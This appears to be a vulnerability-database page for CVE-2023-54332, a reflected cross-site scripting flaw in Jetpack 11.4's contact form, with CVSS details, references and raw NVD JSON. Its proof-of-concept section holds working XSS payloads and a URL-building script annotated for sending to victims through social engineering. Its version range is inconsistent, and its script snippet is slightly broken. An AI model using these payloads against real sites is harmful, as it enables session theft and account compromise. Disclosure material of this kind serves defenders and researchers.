Security Vulnerability Report
CVE-2023-54332 CVSS 6.1 MEDIUM

CVE-2023-54332

Published: 2026-01-13 23:16:01
Last Modified: 2026-01-29 18:54:35

Description

Jetpack 11.4 contains a cross-site scripting vulnerability in the contact form module that allows attackers to inject malicious scripts through the post_id parameter. Attackers can craft malicious URLs with script payloads to execute arbitrary JavaScript in victims' browsers when they interact with the contact form page.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:automattic:jetpack:11.4:*:*:*:*:wordpress:*:* - VULNERABLE
Jetpack < 11.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2023-54332 XSS PoC -->
<!-- Malicious URL to trigger XSS via post_id parameter -->
<a href='http://target-site.com/?p=1&post_id="><script>alert(document.cookie)</script>'>Click Here</a>

<!-- Alternative PoC with event handler -->
<a href='http://target-site.com/?p=1&post_id="><img src=x onerror=alert(String.fromCharCode(88,83,83))>>'>Click Here</a>

<!-- Automated PoC testing script -->
<script>
const targetUrl = 'http://target-site.com';
const xssPayload = '<script>alert(document.domain)</script>';
const maliciousUrl = `${targetUrl}/?post_id=${encodeURIComponent(xssPayload)}`;
console.log('Malicious URL:', maliciousUrl);
// Send this URL to victim via social engineering
</script>

References

https://wordpress.org/plugins/jetpack (Product)
https://www.exploit-db.com/exploits/51104 (Exploit, Third Party Advisory)
https://www.vulncheck.com/advisories/jetpack-cross-site-scripting-xss (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-54332", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:16:00.513", "lastModified": "2026-01-29T18:54:34.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jetpack 11.4 contains a cross-site scripting vulnerability in the contact form module that allows attackers to inject malicious scripts through the post_id parameter. Attackers can craft malicious URLs with script payloads to execute arbitrary JavaScript in victims' browsers when they interact with the contact form page."}, {"lang": "es", "value": "Jetpack 11.4 contiene una cross-site scripting vulnerabilidad en el módulo de formulario de contacto que permite a los atacantes inyectar scripts maliciosos a través del parámetro post_id. Los atacantes pueden crear URLs maliciosas con cargas útiles de script para ejecutar JavaScript arbitrario en los navegadores de las víctimas cuando interactúan con la página del formulario de contacto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": 
"NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:automattic:jetpack:11.4:*:*:*:*:wordpress:*:*", "matchCriteriaId": "C914D82F-80BB-42BF-91AD-A56C0A2F9B43"}]}]}], "references": [{"url": "https://wordpress.org/plugins/jetpack", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51104", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/jetpack-cross-site-scripting-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}